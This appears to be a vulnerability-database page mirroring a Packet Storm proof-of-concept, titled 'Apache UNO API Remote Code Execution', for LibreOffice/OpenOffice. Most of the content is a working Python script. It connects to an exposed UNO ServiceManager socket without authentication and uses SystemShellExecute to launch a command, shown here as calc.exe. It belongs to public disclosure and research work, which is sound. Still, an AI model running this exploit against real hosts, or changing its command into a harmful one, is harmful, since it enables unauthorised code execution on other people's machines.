Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormSud0woodoPACKETSTORM:152100
HistoryMar 14, 2019 - 12:00 a.m.

Apache UNO API Remote Code Execution

2019-03-1400:00:00
sud0woodo
packetstormsecurity.com
37
JSON
`"""  
# Exploit Title: Apache UNO API RCE  
# Date: 2018-09-18  
# Exploit Author: sud0woodo  
# Vendor Homepage: https://www.apache.org/  
# Software Link: https://www.openoffice.org/api/  
# Version:  
  
LibreOffice Version: 6.1.2 / OpenOffice 4.1.6  
  
(but really any version with the UNO API included)  
# Tested on:  
  
Ubuntu Mate 18.04 with kernel 4.15.0-34-generic (but works platform independent)  
  
Proof of Concept code attached as .txt file.  
  
HackDefense advisory:  
https://hackdefense.com/blog/security-advisory-rce-in-apache-uno-api/  
  
HackDefense blogpost:  
https://hackdefense.com/blog/finding-RCE-capabilities-in-the-apache-uno-api/  
  
Unauthenticated RCE LibreOffice/OpenOffice with UNO API  
  
This code represents a small proof of concept of an unauthenticted remote code execution using  
the Apache OpenOffice UNO API (https://www.openoffice.org/udk/). This code has been tested  
against LibreOffice Version: 6.1.1.2 on a Ubuntu Mate 18.04 with kernel 4.15.0-34-generic.  
  
For this PoC to work the target machine needs to run the ServiceManager using an external   
interface. The following command was used to test this PoC:  
  
[Ubuntu]  
Open a terminal and execute the following command:  
soffice --accept='socket,host=0.0.0.0,port=2002;urp;StarOffice.Service'  
  
The above command will start the LibreOffice ServiceManager but this can be executed with the --invisible  
flag to prevent the dialogbox from popping up on the target.  
  
I also made a scanner available that can be used to check for the presence of the StarOffice manager running on a machine:   
  
https://sud0woodo.sh/2019/03/06/building-a-go-scanner-to-search-externally-reachable-staroffice-managers/  
"""  
  
import uno  
from com.sun.star.system import XSystemShellExecute  
import argparse  
  
parser = argparse.ArgumentParser()  
parser.add_argument('--host', help='host to connect to', dest='host', required=True)  
parser.add_argument('--port', help='port to connect to', dest='port', required=True)  
  
args = parser.parse_args()  
# Define the UNO component  
localContext = uno.getComponentContext()  
  
# Define the resolver to use, this is used to connect with the API  
resolver = localContext.ServiceManager.createInstanceWithContext(  
"com.sun.star.bridge.UnoUrlResolver", localContext )  
  
# Connect with the provided host on the provided target port  
print("[+] Connecting to target...")  
context = resolver.resolve(  
"uno:socket,host={0},port={1};urp;StarOffice.ComponentContext".format(args.host,args.port))  
  
# Issue the service manager to spawn the SystemShellExecute module and execute calc.exe  
service_manager = context.ServiceManager  
print("[+] Connected to {0}".format(args.host))  
shell_execute = service_manager.createInstance("com.sun.star.system.SystemShellExecute")  
shell_execute.execute("calc.exe", '',1)  
`
JSON